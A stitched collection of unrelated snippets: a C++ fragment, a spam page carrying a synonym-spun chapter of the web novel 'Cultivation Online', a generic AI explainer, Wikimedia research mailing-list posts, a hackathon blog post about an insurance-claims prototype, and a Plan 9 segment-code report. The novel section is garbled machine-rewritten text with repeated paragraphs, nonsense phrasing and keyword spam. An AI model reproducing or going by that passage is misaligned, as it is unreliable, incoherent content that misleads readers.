this is as expected - a thread can pass a pointer to a stacked buffer to an
ioproc(), for example. To allow for standalone segments to be used the same
way, they needed to appear across rfork().
This interface would also support a libc memory allocator that uses
standalone segments, rather that constraining it to use sbrk() or
pre-allocated segments. This was my original motivation for this project,
though it was a problem I did not get a chance to address.
Any thoughts or discussion on the interface would rock.
|
OPCFW_CODE
|
Aspects of ecosystem services that an organisation or other actor relies on to function. Dependencies include ecosystems’ ability to regulate water flow, water quality, and hazards like fires and floods; provide a suitable habitat for pollinators (who in turn provide a service directly to economies), and sequester carbon (in terrestrial, freshwater and marine realms).
SBTN (2022) Working Definitions [unpublished]
Dependencies can be identified by working through a dependency pathway.
A dependency pathway shows how a particular business activity depends upon specific features of natural capital. It identifies how observed or potential changes in natural capital affect the costs and/or benefits of doing business.
A particular business activity (e.g. coffee production plant) depends upon a specific ecosystem service (e.g. pollination of coffee plants). The pathway identifies how observed or potential changes in natural capital (e.g. decline in bee population due to human-induced habitat change) affect the cost or benefits of doing business (e.g. pollination services imported).
Nature impacts can be identified by working through impact pathways.
Changes in the state of nature, which may result in changes to the capacity of nature to provide social and economic functions. Impacts can be positive or negative. They can be the result of an organisation’s or another party’s actions and can be direct, indirect or cumulative.
A measurable quantity of a natural resource that is used as a natural input to production (e.g. the volume of sand and gravel used in construction) or a measurable non-product output of a business activity (e.g., a kilogram of NOx emissions released into the atmosphere by a manufacturing facility).
An impact pathway describes how, as a result of a specific business activity, a particular impact driver results in changes in natural capital, and how these changes in natural capital affect different stakeholders.
An example of an impact pathway could be as follows: As a result of a specific business activity (e.g. chemical manufacturing plant), a particular impact driver (e.g. air emissions) results in changes in natural capital (e.g. reduced air quality) and how these changes impact different stakeholders (e.g. health problems).
A further example of an impact pathway is provided in the figure below.
The tables below present a selection of potential impact drivers and dependencies to consider when identifying which are most material to your business. You will notice that a business activity (e.g., the use of water) can create both impacts and dependencies and thus appear in both tables. Note: the lists are not exhaustive; impacts and/or dependencies that are relevant to your business but not included here should also be considered.
Please log in with an existing account or create a profile to access additional sector and biome guidance published in v0.4 beta framework. You will need to have a profile to provide feedback and upload a comment letter.
|
OPCFW_CODE
|
Take a look at control and form properties. You initialize them as much as possible at design time in the Properties window. In contrast with VB, GFA-BASIC 32 needs extra code to initialize the item properties of every Ocx that supports a Item collection (ToolBar.Buttons; Status.Panels; etc). Initialization is so important to control and form properties that GFA-BASIC should be extended with more property pages to initialize items at design time. For example, we could use a property box to initialize the strings of a ListBox control at design time, a task you have to perform at run time now.
Initializing variables in general
In some languages, uninitialized variables have a semi-random value. In C, for example, local variables (but not global or static variables) are undefined. If you want an initial value, you must give it. Fortunately for C programmers, this is easy to do. An undefined variable is a disaster waiting to happen, and careful C coders initialize their variables as close to declarations as possible. In contrast, GFA-BASIC 32 always initializes all variables whenever they are declared. String variables are initialized to a "Null-String", numeric variables are initialized to 0, Variants are initialized to Empty, and object variables are initialized to Nothing.
This difference fits the philosophies of C and Basic. C doesn’t initialize variables to a default because local variables must be initialized at run time. This has a cost, and C doesn’t do any run-time work unless you ask for it. Undefined variables are dangerous, but that’s your problem. GFABASIC 32 is more concerned with safety. If you declare an array of 5000 Integers, GFA-BASIC 32 will initialize them all to 0 even if it takes extra run-time work to do so.
However, 0 or Empty might not be the initial value the program needs. In C, you can combine the declaration of a variable with its initialization:
int cLastWindow = 20;
Even arrays can combine a declaration and initialization.
Fortunately, GFA-BASIC 32 allows declaration and initialization in one statement:
[Global] Dim iCountMax As Integer = 23
This usually works fine, and by using the Global statement global variables can be declared in any procedure. GFA-BASSIC 32 doesn't provide a 'Declarations section at the top' like VB, so we must take care when and where we declare global variables. The problem is that initialization-while-declaring requires executable code, the default value must be copied to the variable's memory location.
You need to find some logical place to put the declaration & initialization. That place must be reached only once—either when the program is executed or the first time the variable is accessed.
Global vs Static Variables
A Static variable is a global variable as well. The difference is that a global variable is visible to all parts of your program, while static variables have an implicit Local clause in front of it. They are only accessible inside a procedure. (Note - A Static variable in the main part of the program is local to the Main section only.) The Static variable can be initialized in a combination with a declaration:
Static fFirstTime As Boolean = True
A Static variable is only initialized once the first time the subroutine is executed. Would you use a global variable declaration & initialization inside a subroutine, the global variable would be initialized over and over.
|
OPCFW_CODE
|
At Explo, we take an ID photograph for each student and faculty member when they show up. We take the photos with a mobile device, and within a day they get a lanyard with their photo ID, which they have to carry around all summer. It’s nice when you’ve got 3000 students across three campuses, running field trips all over New England and beyond, to be able to tell who is associated with Explo and who isn’t.
Recently I had the idea: we’ve got these 3000 photo IDs, what does the “average” Explo person look like? I did a quick search online for things like “face morph”, “merge faces”, etc, and you’d be surprised at the proliferation of hideously designed sites claiming to do this. Most of them allow you to merge two different photographs together. None of them allow uploading of 3000 images :)
I don’t have the time to create a solution which does facial geography mapping and morphs each image into another face, so I figured an approach more like Francis Galton’s “multiple exposure” method from the 1800s, except using computers, would be the ticket. Now I love me some ImageMagick and BASH scripting, so I figured I could probably do this that way.
I knew I had to present the results in a better way than just emailing a photo to my coworkers, so I made a website to display the results and the process. Go check it out. That page also has more about my failed attempts and what’s going on. You can also view the source of the image merge script I wrote, and the source for the entire “Faces of Explo” page.
“Wait,” you’re asking, “You promised me rakefiles! You promised me HTML!” You’re absolutely right, thanks for hanging in there, I’m getting to that.
Since creating the web page itself was a relatively trivial process, I thought I’d take the opportunity to try out a couple of new things that had been on my list of cool things I keep reading about on Hacker News. One of those things is using a Rakefile to help with development and deployment. For those of you who don’t know what the hell that is, I found these three articles to be immensely helpful. In short, you write a file that contains the typical things you’d want to do in whatever software project you’re working on, and you can quickly access them from the shell.
For example, on this project, I wanted to be able to:
- Watch/compile my CoffeeScript and SCSS while I was developing without always having to open up two tabs in my terminal and run the watcher routine for both.
- Compress, strip, interlace, and otherwise prepare any image files for the web.
- Deploy the entire site using rsync (since this is a static site).
I managed to be able to do all of that. Now I can type things like
rake compile:all or
rake deploy instead of having to remember the command line incantation every time I just want to make a simple change. Here is the rakefile – I owe much to the rakefile from the Octopress project, which is a nice thing to behold.
Where’s the Missing HTML?
Take a look at the source for the Faces of Explo index HTML page. If you write any HTML code at all, a few things will probably stick out for you immediately: “Hey! He’s not closing any of his paragraph tags? Where’s the HTML tag? Where’s the body? WHAT THE HELL IS GOING ON HERE?”
That’s what I would have thought a week ago looking at the source. That’s before I read Google’s HTML/CSS StyleGuide. As it turns out, many HTML tags are optional in HTML5. Whoa. As they say in the guide,
(This approach may require a grace period to be established as a wider guideline as it is significantly different from what web developers are typically taught. For consistency and simplicity reasons it is best served omitting all optional tags, not just a selection.)
Why is it that nobody’s talking about this new part of the HTML5 spec? I’ve been reading the cool “learn HTML5” sites, and haven’t seen anything about this. I learned it from a footnote in the Google styleguide: let’s bring this syntax into a wider discussion.
I’ve found that you can learn a lot from a style guide. Since they are a condensation of all the things that bug people when they read other people’s code, they are a good guideline for how to write good code, even if you don’t necessarily agree with everything they say. I for one am probably not going to use the abbreviated HTML syntax in my bigger public-facing pages just yet, as I’m concerned about it breaking on older browsers, and maybe even breaking tools like Modernizr.
Stay away from doing Google searches for image morphing, use Rakefiles for automating development tasks, and read other people’s style guides - you might learn something fascinating! Thanks for reading.
|
OPCFW_CODE
|
Data Directory: File path to the directory where your recorded takes will be stored. The data directory can be changed by clicking the “…” button and then selecting a new Data Directory folder.
Take Format: Resolves how shot name and take numbers are resolved in to current take names. This setting can also be edited by double clicking on the current take name.
Watch Save File: Coming Soon
Select: Options for the select field in the Recorded Takes Panel of PeelCapture. Different options should be separated by a comma as shown in the screenshot above.
Device Poll (seconds): The devices are constantly polled to check their status. Change this value to increase or decrease how often this poll happens. This will not affect the performance of the application or devices during recording but rather changes how often the device’s UI is refreshed when the application is idle.
Record Delay: Set a number of seconds to delay the start of recordings after the record button is pressed. Useful for when operating a mocap shoot solo.
Bloop wav: Audio file used during Bloop Events.
Bloop Events: Options for when the Bloop wav is played while recording a take. Start and End will play bloop at the start and end of recording respectively. The 1-3 second options will play Bloop wav at these intervals at the start of recording if selected.
Audio Device: Select the audio device to be used for audio recording, timecode, or both. Only one audio device can be selected. Input Device must be selected to edit the other related fields.
Audio Channels: Select the number of audio channels that you would like to be available for timecode or recording. This will be shown in the Audio Panel as well as the number of options available for selection in the Timecode tab.
Sample Rate: Audio sample rate.
Sample Size: Audio sampling size.
Output Device: Select the audio device to be used for audio output generated from Peel Capture. For example, the audio to indicate a take has started or ended.
Audio can be added as a device to record all channels of the audio device. These channels will be saved as individual .wav files in the Data Directory Folder/Audio Device Name.
Timecode setting will default to the PC Clock, select the source to read the timecode in from your own source. Built in options are PC Clock, Vicon, and Motive. Note: For an external timecode source, you must set the audio device in the Audio tab for the audio channels from your device to be selectable. Active channels can be seen in the Audio panel in the bottom right of the interface. Audio level can be seen in the Timecode tab and Audio panel.
The level meter will show if the audio source signal is active and should usually be floating somewhere in the middle of the bar. If it is too far to the left or all the way to the right, the timecode value may glitch or fail. The quality of the audio interface device will affect the performance of the timecode.
Timecode is used for syncing all of your sources via the PeelCapture website. The starting and ending timecode value is saved for each take in the Takes panel and then is uploaded to the website for syncing purposes. Peel Capture’s web interface allows you to choose timeframes from your reference footage to frame shots for post-production orders.
Enter the hostname of the computer running the Vicon software connect using the DataStreamSDK. This is used to populate the current subjects.
Check the Enabled checkbox to try to connect the computer running Vicon software.
Check the Subjects box if you want to populate the current subjects with the subjects from the Vicon software if the connection was successful.
PeelCapture is able to connect to NatualPoint Motive realtime stream to get active subject names. This connection uses the NatNet sdk and can be configured in PeelCapture settings dialog. There is also a Motive device in PeelCapture, which is used to start and stop recording motion capture data in Motive. Please see the Motive Device section of this documentation for information about how to configure motive settings.
The settings in PeelCapture Options are:
Server Address: The IP or name of the computer running motive
Local Address: The address of the PC running PeelCapture – try using 255.255.255.255
Protocol: Set the protocol to match the “Transmission Type” settings in Motive.
Multicast Address: Try 188.8.131.52
Command Port: Use 1510
Data Port: Use 1511
Motive’s status is indicated at the bottom of these settings as Connected/Disconnected.
The Shotgun site url, script name, and key can be entered for uploading data to Shotgun. Further configuration can be done by editing python/peel_shotugun_publish.py.
Enter your credentials for PeelCapture online services for uploading data and managing projects. Choose the corresponding Company, Project, and Shoot Name before the shoot starts to quickly upload your data to our website once you are finished shooting.
The information shown in the slate window and font can be modified in the Slate Settings.
The slate window can be shown by selecting the “Slate” item in the “Window” dropdown menu.
This window can shown on a second display during the shoot, or recorded to a device for reference video.
|
OPCFW_CODE
|
[aes] Add domain-oriented masking
This PR adds a new S-Box implementation for AES using domain-oriented masking (DOM).
To this end, the distribution of pseudo-random data inside the cipher core needs to be adapted as well. To ease review, I have factored out this first commit into #4642. Pleas only review commits 2 and 3 of this PR.
Note: this PR requires also #4629 .
The DOM S-Box added with this PR has a latency of 5 clock cycles, is unpipelined and requires 28 bits of randomness per evaluation (Canright no-reuse was at 18 bits per evaluation). Since we are using a 128-bit wide datapath with 16 S-Boxes in parallel, there is currently no benefit in using pipelining inside the S-Box. The pipelined versions in the original paper require between 2.6-2.8 kGEs. By avoiding pipelining and applying some additional, new optimizations, this implementation requires less than 1.4 kGE per S-Box. The overall resource consumption of AES with this S-Box is around 73 kGE.
Functional correctness of this implementation has been verified. The masking scheme has not yet been formally verified using the REBECCA tool: static analysis is passing, transient analysis is currently running (and most likely will run for a couple more days).
What's left to do:
[ ] Successfully pass transient analysis using REBECCA.
[ ] Perform initial SCA on FPGA.
[ ] Replace the (* keep = true *) attributes (Vivado and Yosys only) by prim_flop entities.
Update: The transient analysis in REBECCA has now been running for nearly 2 weeks without failure. First FPGA results using this implementation show massive leakage. The resistance against the correlation-enhanced collision attack is comparable with the unhardened implementation (~300000 traces, Canright no-reuse resists up to 1.2 Mio traces). :-(
Thus, I have now reworked the DOM S-Box to add more registers. Due to limitations of the REBECCA tool (doesn't like control signals such as register write enables inside the masked circuit) I can't formally verify the new implementation. However, on the FPGA we get substantial improvements in terms of resistance: with 2 Mio traces, just one single key byte difference can be guessed correctly! We would need at least 15 of 120 key byte differences to recover the key...
I will now clean up this new implementation and update this PR. Please wait with reviewing this and have a look at #4629 and #4642 first.
Update: The transient analysis in REBECCA has now been running for nearly 2 weeks without failure. First FPGA results using this implementation show massive leakage. The resistance against the correlation-enhanced collision attack is comparable with the unhardened implementation (~300000 traces, Canright no-reuse resists up to 1.2 Mio traces). :-(
Thus, I have now reworked the DOM S-Box to add more registers. Due to limitations of the REBECCA tool (doesn't like control signals such as register write enables inside the masked circuit) I can't formally verify the new implementation. However, on the FPGA we get substantial improvements in terms of resistance: with 2 Mio traces, just one single key byte difference can be guessed correctly! We would need at least 15 of 120 key byte differences to recover the key...
I will now clean up this new implementation and update this PR. Please wait with reviewing this and have a look at #4629 and #4642 first.
sorry i've been SUPER behind on the review here.
I will try to get to it next week, although I might just end up asking more
questions :)
On Wed, Jan 6, 2021 at 11:13 PM Pirmin Vogel<EMAIL_ADDRESS>wrote:
Update: The transient analysis in REBECCA has now been running for nearly
2 weeks without failure. First FPGA results using this implementation show
massive leakage. The resistance against the correlation-enhanced collision
attack is comparable with the unhardened implementation (~300000 traces,
Canright no-reuse resists up to 1.2 Mio traces). :-(
Thus, I have now reworked the DOM S-Box to add more registers. Due to
limitations of the REBECCA tool (doesn't like control signals such as
register write enables inside the masked circuit) I can't formally verify
the new implementation. However, on the FPGA we get substantial
improvements in terms of resistance: with 2 Mio traces, just one single key
byte difference can be guessed correctly! We would need at least 15 of 120
key byte differences to recover the key...
I will now clean up this new implementation and update this PR. Please
wait with reviewing this and have a look at #4629
https://github.com/lowRISC/opentitan/pull/4629 and #4642
https://github.com/lowRISC/opentitan/pull/4642 first.
—
You are receiving this because your review was requested.
Reply to this email directly, view it on GitHub
https://github.com/lowRISC/opentitan/pull/4643#issuecomment-755933153,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAH2RSVF4RU27LPFQBIVJYLSYVNK5ANCNFSM4VEPDXFQ
.
sorry i've been SUPER behind on the review here.
I will try to get to it next week, although I might just end up asking more
questions :)
On Wed, Jan 6, 2021 at 11:13 PM Pirmin Vogel<EMAIL_ADDRESS>wrote:
Update: The transient analysis in REBECCA has now been running for nearly
2 weeks without failure. First FPGA results using this implementation show
massive leakage. The resistance against the correlation-enhanced collision
attack is comparable with the unhardened implementation (~300000 traces,
Canright no-reuse resists up to 1.2 Mio traces). :-(
Thus, I have now reworked the DOM S-Box to add more registers. Due to
limitations of the REBECCA tool (doesn't like control signals such as
register write enables inside the masked circuit) I can't formally verify
the new implementation. However, on the FPGA we get substantial
improvements in terms of resistance: with 2 Mio traces, just one single key
byte difference can be guessed correctly! We would need at least 15 of 120
key byte differences to recover the key...
I will now clean up this new implementation and update this PR. Please
wait with reviewing this and have a look at #4629
https://github.com/lowRISC/opentitan/pull/4629 and #4642
https://github.com/lowRISC/opentitan/pull/4642 first.
—
You are receiving this because your review was requested.
Reply to this email directly, view it on GitHub
https://github.com/lowRISC/opentitan/pull/4643#issuecomment-755933153,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAH2RSVF4RU27LPFQBIVJYLSYVNK5ANCNFSM4VEPDXFQ
.
No worries @tjaychen , this PR is currently not so critical. I would prefer people having a look at my other AES PRs that are more urgent in particular #4629.
No worries @tjaychen , this PR is currently not so critical. I would prefer people having a look at my other AES PRs that are more urgent in particular #4629.
Thanks a lot @cdgori for your review and sorry for getting back so late. I had to prioritize other, somewhat less exciting tasks but hope to finish this one soon. I basically need cleanup the DOM S-Box (have a working example with more registers) and then scale down the PRNG.
Thanks a lot @cdgori for your review and sorry for getting back so late. I had to prioritize other, somewhat less exciting tasks but hope to finish this one soon. I basically need cleanup the DOM S-Box (have a working example with more registers) and then scale down the PRNG.
Update: I've cleaned up the DOM S-Box implementation that I've previously successfully measured on FPGA, shrinked the PRNG (gives us back almost 10kGE). Currently collecting new power traces and running formal verification.
Update: I've cleaned up the DOM S-Box implementation that I've previously successfully measured on FPGA, shrinked the PRNG (gives us back almost 10kGE). Currently collecting new power traces and running formal verification.
Update: had to do a rebase and fix a critical issue. I could confirm that the current version is again secure up to at least 2M traces on FPGA. Formal verification is still running.
Update: had to do a rebase and fix a critical issue. I could confirm that the current version is again secure up to at least 2M traces on FPGA. Formal verification is still running.
Thanks @cdgori for your feedback and review. And thanks @imphil for approving the PR.
|
GITHUB_ARCHIVE
|
Not all communicate English so if you aren’t fluent in Spanish be sure you carry a person who can translate in your case.
Whatever the nationality, any one travelling to Peru for organization uses, especially when business contracts or agreements are signed or business associated fiscal transaction are made, must make an application for a company visa in a Peruvian Consulate just before moving into the place.
Pricey Eva , I is going to be at ten Nov. in US-houston for touring trip , and I would want to travel from US-Houston to Peru-Lima for touring intent for 5 times , I'm have already got Iraqi passport and the issue we dont have inside our country Peruvian Embassy or Consulate , am i able to receive the visa in the airport of peru or There is certainly another way to get it online by way of internet .
Philippine passport holder haven't got to make an application for tourist visa. They get an entry stamp (= tourist visa) into their passport within the airport or border. So you will not have any problems coming to Peru.
These procedures at the same time worked as a terrific way to fully grasp that another person have similar desire much like my particular possess to realize excellent offer far more concerning this problem. I do know there are actually quite a few extra enjoyable durations Later on for folk who start off studying .
Following Peruvian law the maximum (!) continue to be over a vacationer visa is 183 days (not 90 times), but There is not a guarantee you get the entire amount of money immediately. So possibly finest request it and you should definitely get the volume of days you intent to stay in Peru.
Very first I measured 2 feet from the bottom in the post (the tip I planned To place into the outlet in the bottom). I marked this off on the two posts.
At this time the airport isn't so hectic; I do think 1 hour really should be adequate to distinct immigration and customs. Furthermore the airport endorses getting on the check-in for your domestic flight 2 hours prior to the flight leaves.
I am an indian citizen Doing work in UAE . I've to visit peru being a tourist to determine my peruvian girlfriend. So what's going to be the requirements for that. I will stick with her so i dont have any lodge reserving as well. Support me or any strategies
Slovenian residents do not have to apply for a visa at a Peruvian Embassy or Consulate prior to getting into the region. You can get an entry stamp on the airport that means that you can continue to be the amount of days created on it by hand in the immigration officer.
Certainly one of the requirements when implementing for your visa for Peru in the US is definitely acquiring lawful residency (not a vacationer visa) inside the states. Have a look at the website of Peruvian Consulates inside the US ("") for detailed info.
hi, im a filipina married into a peruvian. Our marriage was executed in philippines for 8years now..Previous 2010, me and my son (who wasbirth inside the phils.) with my peruvian partner chose to Dwell in this article once and for all. I came right here with our complete paperwork stamped by thailand embassy recognizing that there's no peruvian embassy inside the phils. AS i arrived here, me and my son utilised the tourist visa...Due to the fact right until now im still inquiring the extension of authorization to remain right here.
I would like to volunteer in Peru above the Winter season. I'm a Nepali citizen on a scholar visa (F1) during the US. I went why not try these out to Costa Rica 2 years back considering that in the event you experienced a pupil visa into the US, you could potentially check out Costa Rica for three months. I'm wanting to know if Peru provides a provision like that?
I'm looking to journey to Peru to volunteer with a corporation for the yr. Do I receive a vacationer visa? But This really is only valid for 183 times?
|
OPCFW_CODE
|
- For other appearances of Valeera Sanguinar, see Valeera Sanguinar (disambiguation).
How to get
Diao Chan Valeera can be purchased through a bundle for returning players only.
- Diao Chan Valeera could be purchased through the Three Kingdoms Mini Bundle or the Three Kingdoms Bundle.
- Comes with her own portrait
- Has custom emotes
When viewed in the collection, Diao Chan Valeera has the following flavor text:
- Even a smile can be a weapon if it's wielded properly. Not to mention those fans... Obtained by purchasing the Three Kingdoms Mini Bundle or the Three Kingdoms Bundle.
|Emote: Greetings||▶️Why, hello!|
|Emote: Well Played||▶️Well fought.|
|Emote: Oops||▶️An error?|
|Emote: Threaten||▶️Even flowers have thorns.|
|Emote: Thanks||▶️Thank you kindly.|
|Unused: Sorry||▶️Sorry about that.|
|Concede||▶️I give up.|
|Start||▶️Shall we dance?|
|Running out of time||▶️I must choose soon!|
|Thinking ||▶️I wonder...|
|Thinking ||▶️So many options...|
|Almost out of cards||▶️I'm almost out of cards!|
|Out of cards||▶️I'm out of cards!|
|Error: Need a weapon||▶️I need a weapon.|
|Error: Not enough mana||▶️I don't have enough Mana.|
|Error: Minion exhausted||▶️That minion already attacked.|
|Error: Hero already attacked||▶️I already attacked.|
|Error: Minion not ready||▶️Give that minion a turn to get ready.|
|Error: Hand already full||▶️My hand is too full!|
|Error: Too many minions||▶️I have too many minions.|
|Error: Can't target Stealthed minion||▶️I can't target Stealthed minions.|
|Error: Can't play that card||▶️I can't play that.|
|Error: Not a valid target||▶️That's not a valid target.|
|Error: Must attack Taunt minion||▶️A minion with Taunt is in the way.|
|Error: Generic||▶️I can't do that.|
|Selection in Choose Your Hero||▶️Who, me? Suspicious?|
|Emote: Greetings [Lunar New Year]||▶️Happy New Year!|
|Start [Mirror]||▶️It takes two, after all.|
|Emote: Greetings [Holidays]||▶️Happy Feast of Winter Veil.|
|Emote: Greetings [Happy New Year]||▶️Happy New Year!|
|Emote: Greetings [Fire Festival]||▶️Happy Midsummer.|
|Unused: Greetings [Pirate Day]||▶️Yarrr!|
|Emote: Greetings [Happy Halloween]||▶️Happy Hallow's End.|
|Unused: Greetings [Happy Noblegarden]||▶️Happy Noblegarden.|
|Emote: Greetings [Mirror]||▶️There's a familiar face.|
- Patch 188.8.131.52662 (2021-03-25): Fixed a visual bug where parts of Diao Chan Valeera were not appearing animated.
- Patch 184.108.40.206003 (2021-01-21): Added.
|
OPCFW_CODE
|
On IRQL alone, there is a twenty page document you can find on MSDN. DriverDispatcher handles messages sent to the driver and is usually used to serve messages from the user mode applications that request some action to be done in kernel mode. Gilman Thanks Sir , the approach you take is definitely more friendly and detailed , i hope it will allow me to get through the available simples ; by the way Other than that it's the best beginner's guide to writing Windows drivers. have a peek at this web-site
Dejan Lukan It's an explanation how you can go about writing a kernel driver, which is in ring 0 yes. Create a user interface (C#.Net) and call the DLL. In addition, Microsoft knew that drivers had to be writable in a higher-level language, like C, in order to be code-compatible for different hardware systems. This is because you only need that function during initialization. https://msdn.microsoft.com/en-us/windows/hardware/drivers/gettingstarted/
All the other options (System, Boot and Automatic) cause the driver to be loaded during boot-time - which can be fatal if your driver has a bug in it because you The parameters are explained in more detail at “IoCreateDevice”. Loading... This type of driver will not only function perfectly well on Windows 2000 and XP - but will also work on Windows NT4.
Thanks! This unload routine must be specified during DriverEntry if our driver is to be unloadable, and a pointer to the routine stored in the DriverObject: #include
Which required skills you need to work on 3. Writing Device Drivers In C Generally, you maintain a stack of drivers each with a specific job to do. Related 2How do I write a program which can control a device driver?14I want to create a minifilter driver to transparently redirect disk i/o, but I'm having trouble getting started0Windows device https://msdn.microsoft.com/en-us/library/windows/hardware/ff557573(v=vs.85).aspx The one thing to remember with UNICODE_STRING is that they are not required to be NULL terminated since there is a size parameter in the structure!
Using UMDF today is a problem. UMDF V1 is the older model. It’ll support devices running on Windows versions as old as Windows XP. But UMDF V1 uses an odd, difficult, Device Driver Programming In C Pdf When developing a driver, it's often the case that the driver doesn't work on the first try, so we will crash our whole system. This doesn’t even need to be a real physical serial port! as well as system admin tools which others have built: http://technet.microsoft.com/en-us/sysinternals/bb545021 (In the past called SysInternals built by Mark Russinovich, co-author of "Windows Internal" - MUST READ!!) http://technet.microsoft.com/en-us/sysinternals/bb963901 from these tools
And you don't need to spend lots of money or use complicated IDEs, because the official Windows Device Driver Development Kit (Windows DDK) can be obtained from the following location: http://www.microsoft.com/whdc/devtools/ddk/default.mspx https://en.wikibooks.org/wiki/Windows_Programming/Device_Driver_Introduction We can call it BufferFly() if we want. Windows Driver Development Tutorial Pdf\ In the last piece of this article, we will be writing a user mode application to talk to our driver and it will simply do CreateFile, WriteFile, CloseHandle. Windows Device Driver Programming Tutorial Driver History In the old days of DOS, the computer was free land where anything goes.
This operation will then give us a system virtual address which we can then use to read the memory. Check This Out Sign In·ViewThread·Permalink corrent Member 963904410-Jun-15 17:58 Member 963904410-Jun-15 17:58 corrent this please it's really confusing for me and others usDriverName--->usDeviceName Sign In·ViewThread·Permalink Can we create driver for device to Evan lynn15-Nov-12 20:57 Evan lynn15-Nov-12 20:57 Good article, very detailed Sign In·ViewThread·Permalink Last Visit: 31-Dec-99 18:00 Last Update: 21-Jun-17 10:14Refresh1234567891011 Next » General News Suggestion Please update the links. Device Driver Programming In Linux
Spy movie where recruits are tested by flooding their dormitory Availability at risk due to one offline Domain Name Server? Windows Driver Development Book The network mapped drive may map E: to \Device\NetworkRedirector and the memory stick may map E: to \Device\FujiMemoryStick, for example. Show more Language: English Content location: United Arab Emirates Restricted Mode: Off History Help Loading...
The second string, “\DosDevices\Example”, we will get into later as it’s not used in the driver yet. THE PC BROO 202,008 views 4:32 Loading more suggestions... WDF driver development guideHardware development boardsWindows compatible hardware development boards offer an affordable, yet powerful development system targeted towards the hardware developer, IHV, OEM or any other developer that loves to Device Driver Programming In Embedded Systems The drivers for both systems at this point, were generally written in assembly language, as well.
Published on Mar 7, 2013How to develop a basic Hello World Device Driver and call its functions from a C#.NET windows ApplicationVisit : http://tektips.in/how-to-develop-a-he... The I/O manager does not copy the data, it does not lock the user mode pages in memory, it simply gives the driver the user mode address buffer. There are functional and object-oriented ways to program drivers, depending on the language chosen to write in. have a peek here A good starting point is reading the WDF Overview Word documents.
Every IRP contains all of the information needed for any driver to be able to process a request and return the result. Sign In·ViewThread·Permalink Awesome Article for Beginners like me Aman Thakur7-Feb-16 19:20 Aman Thakur7-Feb-16 19:20 Hi Tony, You saved a lot of my time and helped me understand.
|
OPCFW_CODE
|
How do I Extrude Faces Along Normals, and also shrink in two other directions?
I am extruding plane surfaces along surface normals by selecting the plane, then hitting Option-E (Alt-E), then selecting Extrude Faces Along Normals.
That is all fine, but I also want to shrink the object along the two local axes that are perpendicular to the Normal. So, as the plane gets thicker in one direction, it gets smaller in the other two directions.
I would be grateful for any pointers.
Akin to inset then translate inset face along normal?
Truth be told, I do not know. If we call the Normal, the local Z, then I want to shrink in X and Y. The angles should remain right angles.
This works with Scale, I can edit in X,Y, and Z. But the Z does not exist until I have extruded the plane along its normal. As I do that, I want to also scale the two dimensions of the plane.
is this what you wanna do? https://youtu.be/UViI4VKy-Ww
@Chris Not quite. I want the sides to go in without the angles changing. So not a cuboid becoming a truncated pyramid, but a plane extruding into a cuboid and then scaling down in the two directions that are perpendicular to the normals.
can you show with two pictures what you want?
last try from me: do you want to change it like this after extrude: https://youtu.be/WEpuyZ1I2Ck
Yes, sure. I have added images to the question. 1. Plane. 2. Extruded. 3. Scaled.
Uniform scale around individual origins then extrude along normals.
Imagine the simple case: six square faces arranged as if they were the
six faces of a cube. I would want to scale the 'top' surface in X and
Y and not Z. I would want to scale the 'front' surface in X and Z but
not Y. I would want to scale the sides in Y and Z and not X. And so
on.
Here is the default cube, rotated arbitrarily in edit mode, and after applying edge split modifier to make each face a plane as described.
Uniform scale each by half S 0.5
Extrude along normal by 1 AltE 1
Notice the zero dimension along normal of each plane remains unaffected by scaling.
-To sum up for those who want to do this:
-Starting from the planes. Select all in Object Mode.
-Go to Edit Mode.
-Choose Face Selection method, Select All.
-Transform Pivot Point, Individual Origins.
-Then Scale (S) and after, Extrude Faces along Normals (Option-E).
-Thanks batFINGER and @Robin Betts Please edit my summary if needs be. Now to do it in Python!
If you think about this one the other way round..
The I Inset operator has a 'Depth' setting, which you can adjust in its F9 panel.
If you need further adjustments, perpendicular to normals, for unconnected faces, you could set Pivot to 'Individual Origins', Transform Orientation to 'Normal', and scale in the per-face XY... SShiftZ.
Oops, just read the commentary, but the second half might still apply.
Lol, thought exactly the same thing. Was also thinking solidify modifier thickness driving scale.
in edit mode:
extrude with E and move the mouse up (so you got 4 vertices) - you know this
Tap A to select all vertices
Tap S to scale
Tap Shift Z to scale only on x and y axis - > move your move to your desired scale
An issue will be in scaling step if the face normal is not axis aligned.., which kinda warrants going in other order, uniform scale then extrude.
@batFINGER You correctly anticipate what I am trying to avoid, but I have problems with the uniform scale. I have a large number of these planes, all at different orientations. I can select them all and extrude along their normals. Easy.
If I try to do uniform scale on all the planes, I have a problem even if I pivot around individual origins. Imagine the simple case: six square faces arranged as if they were the six faces of a cube. I would want to scale the 'top' surface in X and Y and not Z. I would want to scale the 'front' surface in X and Z but not Y. I would want to scale the sides in Y and Z and not X. And so on.
If it helps, I will be doing this in Python so perhaps I can scale only along axes that are not zero?
@Chris Thanks! That is working nicely for one object. I need to spend some time to see if I can do this on many objects at the same time.
|
STACK_EXCHANGE
|
How I would build my 2019 Rugby World Cup fixtures site differently next time.
Mid-September, over a typhoon holiday long weekend in Taipei, I put together a very simple website for the 2019 Rugby World Cup. My goal was to show all the fixtures of a tournament for a range of time zones. I also wanted to challenge my design skills and further refine my JAMStack development skillset. I didn't want it to be overly complicated. And I wanted to build it without using any libraries or frameworks as much as possible.
With the 2019 Rugby World Cup now almost at an end, I've been thinking about how I might build a similar website differently next time. In this post, I'll be focusing on two areas in particular - data storage and usability.
Updating the site with match scores & fixtures became a little bit of a burden.
To keep the site as simple as possible, I created a JSON file to store data about the matches. From the outset, I had planned on updating match scores as games completed, and so score data was also stored within this JSON file. It allowed me to quickly spin up the site with data structured just how I wanted it, and no reliance on an external service.
However, it also meant that to update match details I would need to update the JSON file manually. That update would then needed to be committed using Git for the site to rebuild.
This wouldn't have been an issue had I remained at home during the tournament. But I was regularly making trips to Japan to watch games live, and found myself often in a position where I was unable to complete the update process. This meant that the data on the website was sometimes a day or two behind.
How would I handle data storage next time?
If I had to build this site again, I would look to use an online data store such as Airtable to store match and score data. This way, I would be able to update scores through the Airtable app quickly. Using webhooks, IFTTT or Zapier, I'd then be able to automate the build process for the site. This would allow me to keep the website static. Since my phone's always with me, it would speed up the update process significantly (even if Zapier or IFTTT take 15 minutes to pick up changes to Airtable bases).
I might make the time zone conversion more dynamic.
I've definitely got to learn more about service workers.
As a bit of an afterthought when building the website, I decided to try and make it a progressive web app (PWA). This allows the site to be downloaded by a user and run on their device as though it were a native app. However, to be fair, I did this with very little knowledge of setting up service workers.
